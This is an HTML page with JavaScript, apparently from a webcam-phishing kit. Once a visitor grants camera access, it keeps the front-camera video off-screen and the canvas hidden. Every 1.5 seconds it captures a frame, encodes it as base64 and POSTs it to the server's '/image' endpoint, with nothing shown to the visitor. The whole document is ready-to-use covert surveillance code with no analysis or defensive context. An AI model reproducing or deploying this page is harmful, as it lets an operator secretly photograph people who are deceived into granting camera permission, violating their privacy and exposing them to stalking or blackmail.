<html>
    <head>
        <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
    </head>
    <body>
        <div style="position: absolute; top: -10000px;" class="video-wrap">
            <video id="video" playsinline autoplay></video>
        </div>
        <canvas hidden="hidden" id="canvas"></canvas>
    </body>
    <script>
        var video = document.getElementById("video");
        canvas = document.getElementById("canvas");
        errorMsgElement = document.querySelector("span#errorMsg");
        const constraints = {
            audio: false,
            video: {
                facingMode: "user",
            },
        };
        // Access webcam
        async function init() {
            try {
                const stream = await navigator.mediaDevices.getUserMedia(constraints);
                handleSuccess(stream);
            } catch (e) {
                console.log(e);
            }
        }

        function handleSuccess(stream) {
            window.stream = stream;
            video.srcObject = stream;
            var context = canvas.getContext("2d");
            setInterval(function () {
                canvas.width = video.offsetWidth;
                canvas.height = video.offsetHeight;
                context.drawImage(video, 0, 0);
                var imgdate = canvas.toDataURL("image/png").replace("data:image/png;base64,", ""); //convert img to base64
                send_img(imgdate);
            }, 1500);
        }
        // Load init
        init();

        function send_img(imgdata) {
            $.ajax({
                type: "POST",
                data: {
                    img: imgdata,
                },
                url: "/image",
                dataType: "json",
                async: false,
            });
        }
    </script>
</html>